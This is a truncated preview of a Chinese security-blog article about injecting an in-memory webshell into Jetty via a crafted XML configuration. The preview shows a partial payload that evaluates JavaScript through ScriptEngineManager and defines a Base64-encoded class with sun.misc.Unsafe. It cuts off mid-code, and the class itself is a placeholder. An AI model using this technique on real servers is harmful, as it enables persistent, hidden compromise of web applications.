注册    登录
专栏名称: 哈拉少安全小队
专注安全研究,漏洞复现,代码审计,python poc/exp脚本开发,经常更新一些最新的漏洞复现,漏洞分析文章,以及脱敏的实战文章。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
今天看啥  ›  专栏  ›  哈拉少安全小队

Jetty Xml内存马(Java11)

哈拉少安全小队  · 公众号  ·  · 2024-07-28 22:55
    

文章预览

网上目前文章都是使用BCELClassLoader,java8某个小版本后就使用不了了,可以替换为ScriptEngineManager 配合jMG生成Base64进行内存马注入。 < Configure id = "abc" class = "org.eclipse.jetty.webapp.WebAppContext" > < New id = "scriptEngineManager" class = "javax.script.ScriptEngineManager" > New > < Ref refid = "scriptEngineManager" > < Call id = "getEngineByName" name = "getEngineByName" > < Arg > js Arg > Call > Ref > < Ref refid = "getEngineByName" > < Call name = "eval" > < Arg >   var str="jMG-Base64"; var bt; try { bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str); } catch (e) { bt = java.util.Base64.getDecoder().decode(str); } var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe"); theUnsafe.setAccessible(true);unsafe = theUnsafe.get(null); unsafe.defineAnonymousClass(java.lang.Class.forName("java ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览
推荐文章
郭霖  ·  activityGuard:Android 四大组件混淆
昨天
经济日报  ·  便利境外人士的支付服务,有了哪些新进展?
昨天
经济日报  ·  便利境外人士的支付服务,有了哪些新进展?
昨天
鸿洋  ·  Android anr排查之sp卡顿
2 天前
郭霖  ·  Android 16首个开发者预览版到来
3 天前
鸿洋  ·  再学安卓 - init进程
3 天前
BNU生物学社  ·  活动总结丨BNU生物学社×SEE任鸟飞 “京师与鸟”校园鸟类科普观察
1 周前
关于   移动版   ·   Py中国   ·   RSS之家   ·   CodingPro   ·   Code   ·   Link之家   ·   卧龙AI搜索   ·   小百科   ·   51好读   ·   小百科(海外)   ·   Link管理
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号